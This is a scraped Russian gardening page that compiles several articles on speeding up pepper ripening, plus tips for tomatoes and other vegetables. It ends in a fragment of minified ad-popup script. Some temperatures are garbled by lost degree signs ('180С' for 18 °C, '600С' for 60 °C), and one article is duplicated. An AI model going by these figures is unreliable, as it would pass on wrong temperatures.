3 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Что поможет ускорить созревание перца

Что поможет ускорить созревание перца

Климатические условия нашего региона не всегда способствуют полному созреванию плодов. В конце лета, когда ночи короткие и прохладные, эта проблема становится очень актуальной. Опытные садоводы рекомендуют самостоятельно ускорить созревание перца.

Ускорение созревания перца

Правильная посадка

Чтобы получить большой урожай созревшей паприки, заложите для этого условия на самых начальных этапах развития культуры. От посадки растения зависит его дальнейшее развитие и сроки созревания плодов.

  1. Температура. Пользоваться правилом, чем раньше посадишь, тем раньше получишь урожай, можно с крайней осторожностью. Это сработает в регионах с теплым климатом. В остальных случаях сажать культуру можно только в хорошо прогретую землю.
  2. Высаживайте растение на постоянное место в период, когда установилась стабильная комфортная температура. Показатели термометра не должны опускаться ниже 180С днем и 140С ночью.
  3. Освещение. Кусты паприки любят свет. Участок под грядки для этой культуры разбивайте на хорошо освещенных местах. При посадке растений разных сортов правильно размещайте их. Высокорослым культурам отведите участок в центре грядки, низкорослые будут прекрасно себя чувствовать по краям грядки.
  4. Загущенность. Соблюдайте схему посадки сладкого перца. В процессе вегетации растение становится мощным, раскидистым. Соседние кусты будут мешать друг другу. Недостаток света и питательных веществ отрицательно скажется на сроках созревания плодов.
  5. Грунт. Культура любит плодородную и легкую почву. Перед посадкой обязательно удобрите землю на грядках органическими удобрениями. Внесите доломитовую муку, чтобы снизить кислотность почвы. Для придания легкости грунту периодически проводите рыхление грядок.
  6. Удобрения. Не пренебрегайте подкормками. Для каждого периода развития культуры необходимы те или иные питательные вещества. Не стоит удобрять растение азотом в период цветения или плодоношения. Правильно организованный режим питания способствует сокращению сроков созревания плодов.
  7. Полив. Перчик поливайте редко, но обильно. Создание высокой влажности для культуры обернется развитием грибковых и бактериальных заболеваний.

Прищипывание

Для нормального развития культуре хватает двух-трех побегов. Прищипывание кустов заставит растение экономить свои силы и ускорит созревание перчиков. Опытные огородники поступают следующим образом:

  • на еще маленьком кусте удаляют коронный бутон;
  • в период активного цветения обрывают пустоцветы;
  • на протяжении всего периода роста избавляются от лишних побегов;
  • в конце лета срывают абсолютно все цветы;
  • в период приближения холодов собирают мелкие перчинки, которые не достигнут периода зрелости.

Эти нехитрые манипуляции позволяют культуре направить все свои ресурсы на созревание завязавшихся плодов.

Рекомендации

Поливать нужно теплой водой

Огородники на практике убедились, что можно ускорить созревание плодов паприки, прибегая к маленьким хитростям. К ним можно отнести:

  • создание дополнительных укрытий;
  • поддерживание оптимального температурного режима;
  • полив культуры горячей водой;
  • внекорневые подкормки растения;
  • удаление лиственной массы.

Укрывание

После высадки всходов на постоянное место соблюдайте постоянный благоприятный температурный режим. Для перцев зона комфорта находится в пределах от 200С до 250С в дневное время и от 150С до 180С в ночное.

Для обеспечения этого соорудите укрытие для растений. Используйте нетканый материал, агроволокно. Накрывайте грядки с культурой при необходимости.

Такие укрытия продолжайте использовать при первых осенних холодах. Так вы сможете собирать урожай до наступления заморозков.

Проветривание

В конце лета и начале осени в теплицах образуется конденсат из-за разниц дневных и ночных температур. Это приводит к размножению патогенных грибов и болезнетворных бактерий. Растение останавливается в развитии.

Чтобы избавиться от такой проблемы, проветривайте теплицу. Днем оставляйте помещение открытым, а на ночь закрывайте.

Для тех кустов, которые растут в открытом грунте, позаботьтесь о пленочных укрытиях на ночь.

Теплая вода

Чтобы ускорить созревание томатов, перцев, огородники советуют использовать для полива культур в холодное время довольно горячую воду. Ее температура может быть от 40 до 600С. Поливайте растение под корень, старайтесь не наливать воды на листья.

Внекорневые подкормки

В период массового образования завязей один раз в десять дней опрыскивайте культуру. Используйте слабые растворы фосфорно-калийных удобрений или настой древесной золы.

В специализированных магазинах появились препараты – стимуляторы образования плодов. Такие составы не рекомендуется применять в конце августа и осенью. Они спровоцируют образование новых перчинок, а существующие плоды перестанут зреть.

Обрывание листвы

Когда на кустах навязались перчики, им для созревания листья не нужны. Оборвите часть листьев. Это позволит растению перенаправить силы на созревание плодов. Не усердствуйте, всю листву обрывать не стоит. Это может привести к ожогам самих завязей.

Искусственное созревание

Паприка имеет две стадии созревания – техническую и биологическую.

Использовать плоды можно уже на первой из них. Технически спелый плод обладает всеми свойствами, что и биологически созревший, кроме цвета. Он имеет светло-зеленый окрас.

Как ускорить процесс созревания перцев?

Ускорение роста болгарского и острого перца можно обеспечить путём выполнения элементарных агротехнических мероприятий. Что именно делать и как, читайте ниже.

Особенности роста и созревания перца

Рост горького и сладкого перцев имеет одинаковые особенности, учитывая которые можно эффективно управлять скоростью созревания плодов:

  • прорастание семян происходит при температуре +25°С;
  • от момента проклёвывания семян до появления первых всходов проходит 2 недели;
  • от момента появления первых всходов с 2 семядольными листьями до появления первого настоящего листа проходит 15–20 дней;
  • после появления первого настоящего листа на формирование каждого последующего уходит по 1 неделе;
  • в зависимости от сортовой принадлежности период бутонизации наступает через 40–90 дней от момента появления всходов;
  • после формирования бутона до вступления в фазу цветения проходит 15–25 дней;
  • на цветение каждый цветок затрачивает по 6 дней;
  • от момента формирования завязи до технической спелости проходит 20–30 дней;
  • от предыдущей фазы спелости плода до биологической также проходит ещё 20–30 дней;
  • минимальный срок от появления первых всходов до технической спелости 75 дней, максимальный — 165 дней.

Как ускорить созревание перцев?

Добиться ускоренного роста перечной культуры позволяют:

  • агротехнические приёмы;
  • препараты для быстрого роста.

Техники ускорения созревания перцев для теплиц и открытого грунта в некоторых нюансах отличаются, но есть и одинаковые моменты:

  • замачивание семян в ускорителях роста («Циркон», «Корневин», гумат натрия) согласно инструкции;
  • полив ускорителями роста рассады;
  • посадка растений на определённом расстоянии друг от друга для обеспечения полноценного освещения куста со всех сторон — 60 см для низкорослых сортов и 80–100 см — для высокорослых;
  • регулярное внесение удобрений;
  • организация качественного умеренного полива — влажность почвы должна составлять 50%.

В теплице

Для ускорения созревания перца в парнике, растениям необходим правильный полив. В жаркую погоду при снижении влажности в воздухе полив в теплице осуществляется 2 раза в сутки — утром и вечером. Один раз в суки проводится полив под корень (0,5–1 л), 1 раз — дождевание (500 мл). В нормальную погоду полив осуществляется 1–2 раза в неделю. Под каждый куст вносится по 2 л жидкости.

Следующее агротехническое мероприятие, позволяющее ускорить созревание плодов — формирование кроны. Чтобы растение давало боковые побеги, которые будут плодоносить, а не тратило силы на вытягивание в высоту, коронный бутон удаляют сразу. Для развития растению достаточно 2–3 побегов. Остальные удаляют. Прищипывая точки роста лишних побегов, оставляют по одному верхнему листу для каждого бутона. Если этого не сделать, плод не сможет развиваться. Нижние бесплодные побеги подлежат удалению вместе с листвой.

Они только расходуют ресурсы растения, а также способствуют размножению грибковых заболеваний и вредителей, соприкасаясь с почвой. По мере достижения плодами технической зрелости, листья, находящиеся рядом с ними, нужно удалять. Крона перца хрупкая, поэтому нуждается в опоре. В качестве неё в теплице удобна горизонтальная шпалера. По мере роста растений, ветки, на которых формируются плоды, необходимо надёжно фиксировать к опоре.

Подкормку вносят 1–2 раза в месяц:

  • на этапе формирования первого листа — ускоритель роста («Корневин», гумат натрия или «Циркон»), который использовался для замачивания семян;
  • с появлением 3 настоящих листьев — мочевина (по 40 г/м²);
  • в период бутонизации раствор куриного помёта (развести помёт с водой 1:1);
  • через 10 дней опрыскивание по листу раствором древесной золы (на 10 л воды 500 г золы);
  • после цветения применять препарат «Эмочки Плодородие» согласно инструкции для полива и листового опрыскивания.

Также созревание перца ускоряется при своевременном сборе урожая. По мере достижения плодами технической зрелости их нужно снимать с кустов. Это даст возможность сформироваться следующей волне урожая, а биологической зрелости перец может достигнуть, полежав 2–3 дня на подоконнике.

В открытом грунте

Чтобы ускорить созревание перца в открытом грунте, лучше использовать рассадный способ размножения. После посадки укрывайте растения агроспаном. Проводить процедуру можно на протяжении всего вегетационного периода. Насаждения укрывают на ночь, а утром материал снимают. Это позволяет избежать негативного влияния колебаний ночной и дневной температур. Полив в открытом грунте осуществляется раз в неделю по 2–3 л воды на растение. Сразу после полива почву необходимо взрыхлить и замульчировать компостом. Высота слоя мульчи — не менее 5 см.

Эта процедура позволяет:
  • повысить плодородность почвы;
  • сохранить необходимый запас влаги;
  • уберечь растения от заболеваний и вредителей;
  • сохранить в почве кислород после аэрации.

В открытом грунте кусты также необходимо формировать. Можно выполнить обрезку по вышеописанной методике. Высокорослым кустам необходимо сразу устанавливать опоры. В открытом грунте в качестве опоры подойдут готовые каркасы в форме цилиндра или конуса. Такие конструкции сразу надевают на рассаду в момент пересадки. По мере роста плодоносные ветки выкладывают на опорные части. Для большого количества кустов лучше вкопать по бокам от каждого растения по 2 палки и натянуть между ними несколько верёвок.

Для ускорения созревания перца в открытом грунте ему также потребуются питательные вещества. До цветения можно использовать вышеописанную схему подкормок с теми же элементами. После цветения каждые 2 недели нужно вносить раствор золы и дрожжевой раствор. В золе содержится 30 микроэлементов, необходимых для ускорения цветения и формирования полноценных плодов. Делают раствор по вышеописанным пропорциям и вносят под корень и по листу по 1 л на растение. Дрожжевой раствор обогащает почву кислородом и стимулирует рост.

Делают его так:
  1. На 10 л воды (+30°С) добавить 12 г дрожжей и 1 ст. л. сахара.
  2. Настоять 3 дня в тёмном помещении с температурой воздуха +25°С.
  3. Процедить и вносить по 1 л под корень и по 500 мл по листу.

Листовую подкормку проводят вечером, корневую — утром. В открытом грунте также необходимо вовремя снимать урожай, чтобы дать возможность молодой завязи полноценно развиваться. Сразу после сбора одной волны плодов проводят подкормку.

Дополнительные рекомендации по выращиванию перца

Несколько рекомендаций, которые помогут повысить урожайность:

  1. Соблюдайте правила севооборота. На прежнее место перец можно сажать только через 3 года. Лучшие предшественники и соседи для перца — бобовые, огурцы и капуста.
  2. Если нет возможности часто менять место посадки после уборки урожая, засеивайте участок зерновыми культурами, а перед наступлением заморозков, скашивайте наземную часть и проводите глубокую аэрацию (20 см), заделывая зелень в почву.
  3. Не вносите свежую органику под перечные кусты. Обязательно разводите навоз с водой 1:1.
  4. В теплице после окончательной уборки урожая снимайте верхние 15 см грунта и меняйте его на смесь торфа и песка (1:1).
  5. Не проводите высадку рассады в грунт, если он не прогрелся до +15°С.

Ускорить созревание перца можно посредством выполнения элементарных агротехнических мероприятий, а также применяя различные ускорители роста. Если нет желания применять ускорители роста, их легко заменят органические удобрения. Наиболее подходящими в этом плане являются навоз и древесная зола.

28 способов ускорить созревание томатов, перца, баклажанов и других овощей

Добавление статьи в новую подборку

В климате средней полосы лето короткое и прохладное, поэтому некоторые овощи не успевают созреть к концу сезона. Чтобы не остаться без урожая, процесс созревания нужно простимулировать.

Вот несколько нехитрых приемов, благодаря которым томаты, огурцы, перцы, баклажаны, картофель, тыквы, дыни, морковь, капуста и лук будут развиваться быстрее.

Как ускорить созревание помидоров

1. В течение 2-3 дней поливайте кусты розовым раствором марганцовки.

2. Опрыскайте растения по листьям раствором йода (30-35 капель на 10 л теплой воды). Раз в неделю поливайте томаты под корень йодом (20 капель на 10 л воды), смешанным с 1 л кисломолочной сыворотки. Расход на каждый куст – около 2 л.

3. При помощи заостренной деревянной палочки сделайте 2-3 прокола (на глубину 2-3 мм) около плодоножки. Плоды созреют быстрее, но долго храниться не будут.

4. Кожуру банана поместите в полиэтиленовый пакет и завяжите его прямо на кисти с зелеными томатами. Через 2-3 дня пакет снимите.

5. Сократите поливы и подкормки минеральными удобрениями.

6. Для быстрого созревания томатов в теплице закройте ее на сутки. А по прошествии этого времени вечером проветрите, чтобы избавиться от конденсата.

7. Томатный куст потяните на себя, чтобы корни у куста слегка надорвались. Тогда растение направит все питательные вещества к плодам.

8. Удалите с плодовых кистей недавно завязавшиеся бутоны. Они все равно не успеют сформировать плоды.

9. Прищипните верхушки томатов над пятой кистью.

10. Опрыскайте кисти с недавно завязавшимися плодами вытяжкой суперфосфата. Для этого 2,5 ст.л. суперфосфата залейте 1 л горячей воды, настаивайте в течение суток, затем процедите.

11. При прохладной погоде на ночь накрывайте томаты пленкой.

12. Чтобы плоды не касались грунта, под нижние кисти поставьте подпорки и поверните их так, чтобы томаты освещались солнцем.

13. Если температура ночью опускается ниже 10°С, снимите недозревшие плоды вместе с плодоножкой и положите на дозаривание.

14. Если на листьях появились признаки фитофтороза, вырвите кусты с корнем и подвесьте в теплом помещении верхушкой вниз. Плоды быстро покраснеют благодаря притоку к ним питательных веществ из листьев и стебля.

15. Стебель на высоте 3 см от земли обкрутите тонкой медной проволокой. При этом старайтесь не перерезать его полностью. Благодаря этому приему к корням будет поступать меньше полезных веществ, а к плодам – больше.

16. На зеленые томатные кисти наденьте плотные полиэтиленовые пакеты с разрезом внизу. Внутри такого колпака температура воздуха будет выше, и плоды быстрее поспеют.

Как ускорить созревание перцев и баклажанов

17. Чтобы корни «дышали», регулярно рыхлите почву на глубину 5-7 см.

18. Снимите все плоды, достигшие нужного размера, и положите на дозревание в теплое место.

19. На высоком стебле при помощи острого ножа или лезвия сделайте сквозной продольный надрез длиной 7-10 см на 15 см выше поверхности почвы. Вставьте в него деревянную щепку толщиной 4-5 мм. Тогда растение направит питательные вещества не к листьям, а к плодам.

20. Обработайте растения по листьям настоем золы (2 стакана на 10 л воды).

Как ускорить созревание картофеля

21. За 15 дней до уборки урожая опрыскайте кусты 2%-ным раствором медного купороса или крепким настоем суперфосфата: 2 кг удобрения тщательно размешайте в 10 л воды, настаивайте 2 дня, затем отделите от осадка.

Как ускорить созревание тыквы и дыни

22. Прищипните верхушки всех молодых побегов и удалите цветки. Когда плоды достигнут нужного размера, обломайте листья так, чтобы на каждый плод их осталось только по 5-7 штук. Этого количества достаточно, чтобы помочь вызреть тыквам и дыням. При этом старайтесь удалять те листья, которые заслоняют солнце.

Как ускорить созревание огурцов

23. Несколько плетей снимите с опор, положите на землю, удалите нижние листья, а оголившийся стебель присыпьте почвой. Скоро на растении образуются новые молодые корни, которые будут дополнительно питать плоды.

Как ускорить созревание моркови

24. Если летом идут затяжные дожди, обрежьте ботву так, чтобы на растениях остались «хвостики» длиной 5-6 см без листьев. Тогда корнеплоды не растрескаются по мере созревания.

Как ускорить созревание белокочанной капусты

25. Обработайте посадки регулятором роста (например, Новосилом или Гибберсибом).

26. У капусты ранних сотов поднимите вверх горизонтально расположенные листья и свяжите в неплотный пучок или наденьте на них кольцо из нарезанных молочных пакетов. Этот прием ускорит поступление питательных веществ из листьев к плодам.

Как ускорить созревание лука

27. Подсохший лук зреет быстрее и не гниет, поэтому прекратите поливать его примерно на 10-14 дней. А в дождливую погоду накрывайте грядку прозрачной полиэтиленовой пленкой.

28. Отгребите землю от луковиц так, чтобы они обнажились примерно наполовину. Так они быстрее созреют, поскольку на воздухе им будет теплее, чем в почве.

Чеснок после выламывания стрелок надо завязать на узел. Это послужит ему сигналом, чтобы направить питание не на ботву, а на луковицу. Также нужно отгребать землю от кустика, чтобы луковица слегка оголилась. Так делала моя бабушка. (Алевтина Замараева)

А какими эффективными способами ускорения созревания овощей пользуетесь вы?

Как ускорить созревание перцев в теплице: лучшие способы и лайфхаки опытных дачников

Перец – теплолюбивое растение, поэтому в открытом грунте растет только в южных областях. В регионах с холодным климатом его культивируют в теплицах или парниках. Но зачастую и в теплицах садоводы вынуждены принимать меры для ускорения созревания плодов.

Виды спелости перца

Спелость перца может быть двух видов: техническая и биологическая. Сбор урожая возможен и в технической, и в биологической зрелости.

Техническая спелость

Стадия технической спелости – состояние плодов, когда они достигли нормальных размеров, но не дозрели. Цвет темно-зеленый, белый или желтоватый. Такой перец собирают для хранения, продажи или перевозки. Плоды, собранные при технической спелости, могут храниться до двух месяцев и постепенно созревать.

Биологическая спелость

Биологическая спелость – аналог репродуктивной зрелости, когда семена заканчивают цикл развития. Плоды приобретают яркую окраску – красную, желтую, оранжевую, черную и т.д., в зависимости от сорта. В таком состоянии перец долго не хранится.

Горький перец собирают только при полной биологической спелости.

Плоды собирают каждые 4-5 дней, чтобы не уменьшилась урожайность.

Справка! Перец – многолетнее растение. Если его пересадить в цветочный горшок в конце сезона, он будет плодоносить до декабря. Затем перейдет в состояние покоя, а с февраля вновь начнет активно расти.

Способы, которые помогут ускорить созревание перца

Чтобы получить хороший урожай созревших плодов, необходимо позаботиться о соблюдении всех условий на самых ранних стадиях развития растения.

Агротехнические приемы

Правила агротехники помогут получить хороший урожай сочных плодов:

  1. Семена. Семена перца трудно набухают и прорастают спустя две недели. Для ускорения процесса можно замочить семена в ускорителях роста, таких как «Нарцисс», «Циркон», «Эпин экстра», «Энерген». Растения плохо переносят пересадку в раннем возрасте, поэтому рекомендуется заделывать семена сразу поглубже, на 4-5 см.
  2. Температура. Высаживать рассаду можно только в прогретую почву. Температура воздуха не должна опускаться ниже 14°C. Следите, чтобы не было больших колебаний между дневной и ночной температурами. Для этого культуру лучше высаживать в невысоких теплицах или парниках, там держится более стабильная температура, нет резких колебаний.
  3. Освещение. Для перца важна освещенность, место выбирайте солнечное. Не рекомендуется загущать посадки, необходимо выдерживать расстояния между растениями не менее 30 см, чтобы каждый куст было равномерно освещен.
  4. Почва. Культура любит плодородную легкую почву. Перед посадкой внесите органические удобрения. Рассада тоже нуждается в регулярных подкормках, начиная с появления первого листа. Почву необходимо регулярно неглубоко рыхлить для лучшей аэрации.
  5. Полив. Перец поливают только теплой водой! В нормальную погоду растения в теплице поливают 1-2 раза в неделю в расчете 1-2 литра воды на куст. В жаркую погоду при снижении влажности перец в теплице поливают два раза в день: один раз под корень (1 л) и второй раз дождеванием прохладной водой (500 мл на куст).
  6. Формирование кроны. Первый бутон сразу удаляют, чтобы пошли боковые побеги. Для развития растению достаточно 2-3 побегов. Обязательно убирают пустоцветы в период массового цветения, а в конце лета — все цветы. С наступлением холодов собирают все маленькие перчики, они все равно уже не вызреют. Нижние побеги вместе с листвой удаляют, они расходуют питание, а плодов на них не будет.

Народные методы

Огородники пытаются ускорить созревание плодов с помощью маленьких хитростей:

  1. В отапливаемых теплицах урожай созревает на месяц раньше, растягивается и период плодоношения.
  2. Полив горячей водой, 40-60°C в холодный период.
  3. Проветривание теплицы. Чтобы не образовывался конденсат из-за разницы ночных и дневных температур, необходимо на ночь теплицу закрывать, а днем держать открытой.
  4. Внекорневая подкормка наземной части растения. Периодически дачники опрыскивают листья настоем золы (два стакана на 10 л воды).
  5. Сбор урожая. Для экономии питательных веществ плоды в стадии технической спелости снимают. Их помещают в темное место: через 2-3 дня у вас будут спелые разноцветные перчики.

Важно! Поливают кусты вечером, за три часа до захода солнца.

Лайфхаки опытных дачников

Приведем несколько приемов, которые используют опытные огородники для ускорения созревания перцев:

  1. Высадка рассады в утепленный грунт. В качестве биотоплива используют сухое сено, листву, не перепревший компост.
  2. Различные добавки в лунку при посадке. В лунку добавляют банановую кожуру, золу, толченую яичную скорлупу, сено и даже птичьи перья. Не забывайте про минеральные удобрения — доломитовую муку или калий без хлора.
  3. Настой сорной травы для удобрения. Хороший эффект дает настой крапивы. Половину 10-литрового ведра травы заливают водой, настаивают неделю. Затем разбавляют стакан настоя в 10 л воды.
  4. Удобрение «бражкой», которую готовят из 3 л воды, стакана сахара, 100 г дрожжей, 2-3 сырых натертых картофелин. Затем этот настой разводят с водой в соотношении 1:10.
  5. В качестве удобрения используют птичий помет.
  6. Сократить частоту поливов можно с помощью гидрогеля. Для этого при высадке рассады в лунку, помимо перечисленных выше добавок, вливают 1 л горячей воды и полстакана «киселя», приготовленного из гидрогеля, и прямо на него высадить растение.

Справка. Гидрогель — вещество, поглощающее влагу с целью в дальнейшем подпитывать ей растение.

Как ускорить созревание сладкого и острого перца

Агротехника горького и сладкого перца одинаковая. Для быстрого созревания перцев решающее значение имеет формирование куста. Необходимо прищипнуть верхушку растения, а также удалить боковые побеги. Острый перец прищипывают, когда он достигнет высоты 25 см.

Еще можно использовать такой прием: на высоком стебле с помощью ножа или лезвия сделать сквозной продольный надрез, отступив от почвы 15 см. Длина надреза – около 10 см. В этот надрез вставить щепку толщиной 4-5 мм. Тогда растение направит все питательные вещества к плодам.

В теплице/в открытом грунте

О том, как ускорить созревание перцев в теплице, мы рассказали выше. Остановимся на особенностях открытого грунта. После пересадки растения укрывают нетканым материалом. И лучше оставить их под ним на весь вегетационный период. Днем (если позволяет погода) укрывной материал убирают.

В открытом грунте перцы поливают редко, но обильно. После полива почву рыхлят и мульчируют компостом высотой 5 см. Это сохраняет влагу, повышает плодородность почвы.

Обрезка куста тоже важна, как и при выращивании в теплице. Возможно, потребуются опоры для плодоносящих веток.

В открытом грунте не меньшую роль играют подкормки для ускорения созревания. Используем те же настои, золу, минеральные удобрения.

Внимание! Внекорневые подкормки начинают действовать через несколько часов, поэтому утром растения опрыскивают чистой водой, чтобы избежать ожогов.

Для повышения урожайности также важно соблюдать севооборот. А в теплице после сбора урожая желательно снять 15 см грунта и заменить его на смесь торфа и песка в пропорции 1:1.

Заключение

Чтобы ускорить созревание перцев, достаточно грамотно перераспределить силы растения в нужных направлениях. Для этого используем комплекс агротехнических приемов и обеспечиваем растениям комфортные условия для развития.

Что поможет ускорить созревание перца

Что поможет ускорить созревание перца

Климатические условия нашего региона не всегда способствуют полному созреванию плодов. В конце лета, когда ночи короткие и прохладные, эта проблема становится очень актуальной. Опытные садоводы рекомендуют самостоятельно ускорить созревание перца.

Ускорение созревания перца

Правильная посадка

Чтобы получить большой урожай созревшей паприки, заложите для этого условия на самых начальных этапах развития культуры. От посадки растения зависит его дальнейшее развитие и сроки созревания плодов.

  1. Температура. Пользоваться правилом, чем раньше посадишь, тем раньше получишь урожай, можно с крайней осторожностью. Это сработает в регионах с теплым климатом. В остальных случаях сажать культуру можно только в хорошо прогретую землю.
  2. Высаживайте растение на постоянное место в период, когда установилась стабильная комфортная температура. Показатели термометра не должны опускаться ниже 180С днем и 140С ночью.
  3. Освещение. Кусты паприки любят свет. Участок под грядки для этой культуры разбивайте на хорошо освещенных местах. При посадке растений разных сортов правильно размещайте их. Высокорослым культурам отведите участок в центре грядки, низкорослые будут прекрасно себя чувствовать по краям грядки.
  4. Загущенность. Соблюдайте схему посадки сладкого перца. В процессе вегетации растение становится мощным, раскидистым. Соседние кусты будут мешать друг другу. Недостаток света и питательных веществ отрицательно скажется на сроках созревания плодов.
  5. Грунт. Культура любит плодородную и легкую почву. Перед посадкой обязательно удобрите землю на грядках органическими удобрениями. Внесите доломитовую муку, чтобы снизить кислотность почвы. Для придания легкости грунту периодически проводите рыхление грядок.
  6. Удобрения. Не пренебрегайте подкормками. Для каждого периода развития культуры необходимы те или иные питательные вещества. Не стоит удобрять растение азотом в период цветения или плодоношения. Правильно организованный режим питания способствует сокращению сроков созревания плодов.
  7. Полив. Перчик поливайте редко, но обильно. Создание высокой влажности для культуры обернется развитием грибковых и бактериальных заболеваний.

Прищипывание

Для нормального развития культуре хватает двух-трех побегов. Прищипывание кустов заставит растение экономить свои силы и ускорит созревание перчиков. Опытные огородники поступают следующим образом:

  • на еще маленьком кусте удаляют коронный бутон;
  • в период активного цветения обрывают пустоцветы;
  • на протяжении всего периода роста избавляются от лишних побегов;
  • в конце лета срывают абсолютно все цветы;
  • в период приближения холодов собирают мелкие перчинки, которые не достигнут периода зрелости.

Эти нехитрые манипуляции позволяют культуре направить все свои ресурсы на созревание завязавшихся плодов.

Рекомендации

Поливать нужно теплой водой

Огородники на практике убедились, что можно ускорить созревание плодов паприки, прибегая к маленьким хитростям. К ним можно отнести:

  • создание дополнительных укрытий;
  • поддерживание оптимального температурного режима;
  • полив культуры горячей водой;
  • внекорневые подкормки растения;
  • удаление лиственной массы.

Укрывание

После высадки всходов на постоянное место соблюдайте постоянный благоприятный температурный режим. Для перцев зона комфорта находится в пределах от 200С до 250С в дневное время и от 150С до 180С в ночное.

Для обеспечения этого соорудите укрытие для растений. Используйте нетканый материал, агроволокно. Накрывайте грядки с культурой при необходимости.

Такие укрытия продолжайте использовать при первых осенних холодах. Так вы сможете собирать урожай до наступления заморозков.

Проветривание

В конце лета и начале осени в теплицах образуется конденсат из-за разниц дневных и ночных температур. Это приводит к размножению патогенных грибов и болезнетворных бактерий. Растение останавливается в развитии.

Чтобы избавиться от такой проблемы, проветривайте теплицу. Днем оставляйте помещение открытым, а на ночь закрывайте.

Для тех кустов, которые растут в открытом грунте, позаботьтесь о пленочных укрытиях на ночь.

Теплая вода

Чтобы ускорить созревание томатов, перцев, огородники советуют использовать для полива культур в холодное время довольно горячую воду. Ее температура может быть от 40 до 600С. Поливайте растение под корень, старайтесь не наливать воды на листья.

Внекорневые подкормки

В период массового образования завязей один раз в десять дней опрыскивайте культуру. Используйте слабые растворы фосфорно-калийных удобрений или настой древесной золы.

В специализированных магазинах появились препараты – стимуляторы образования плодов. Такие составы не рекомендуется применять в конце августа и осенью. Они спровоцируют образование новых перчинок, а существующие плоды перестанут зреть.

Обрывание листвы

Когда на кустах навязались перчики, им для созревания листья не нужны. Оборвите часть листьев. Это позволит растению перенаправить силы на созревание плодов. Не усердствуйте, всю листву обрывать не стоит. Это может привести к ожогам самих завязей.

Искусственное созревание

Паприка имеет две стадии созревания – техническую и биологическую.

Использовать плоды можно уже на первой из них. Технически спелый плод обладает всеми свойствами, что и биологически созревший, кроме цвета. Он имеет светло-зеленый окрас.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
